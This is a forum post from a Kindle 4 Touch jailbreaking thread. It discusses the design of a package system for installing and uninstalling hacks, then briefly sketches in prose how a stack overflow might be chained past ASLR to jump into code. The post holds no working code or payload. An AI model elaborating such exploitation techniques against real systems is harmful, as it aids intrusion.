Thread: [Progress] Jailbreaking Kindle 4.0 (Touch/No Keyboard)
View Single Post
Old 11-22-2011, 07:43 AM   #99
yifanlu
Kindle Dissector
yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.yifanlu ought to be getting tired of karma fortunes by now.
 
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
Quote:
Originally Posted by dsmid View Post
Some time ago I was thinking about the same thing.
My conclusion was almost the same as yours, with few differences.
I'd like to have two more hooks: install.sh and uninstall.sh .
Many hacks need to write to the root partition when installed (besides installing SysV service script), install.sh would offer install-time executed shell script,
uninstall.sh would be copied to a secure place when package is installed (renamed to /opt/packages/<package name>) and run when /mnt/us/packages/<package name>/ deletion is detected.
On each start the packaging system service would compare /opt/packages/ contents with /mnt/us/packages/ and run install (a new kid on the block) or renamed uninstall script (package deleted on US).

Copying to /opt/packages/ may appear as an unnecessary abuse of the root partition but it makes sense.
The users often try to solve their problems with hacks by making a factory reset, hoping it will rollback all changes made to their Kindle. That makes the situation even worse, leaving the hacks in an inconsistent state (true support nightmare).

If the package registry is protected from factory reset, the packaging system would be able to finish the uninstallation procedure of all hacks and make the Kindle clean of all hacks as desired (with the exception of the packaging system/jailbreak)
Could you give an example of rootfs usage other than copying an init script? I would rather manually implement anything that requires access to rootfs than let all scripts modify it. That's one of the main problems I have, after a while, I don't know what files on thr FS are modified. Especially since I lost the uninstaller scripts.

Quote:
Originally Posted by Lorphos View Post
randomize_va_space picks one of only 8192 locations. Perhaps it can still be defeated? A format-string bug would be the ticket.
I was thinking something along the lines of 1) push location of an instruction that copes SP pointer to another register, and pops stack into pc and 2) push location of instruction that jumps to said register. Then when the overflow runs it does two jumps.
Last edited by yifanlu; 11-22-2011 at 07:46 AM.
yifanlu is offline   Reply With Quote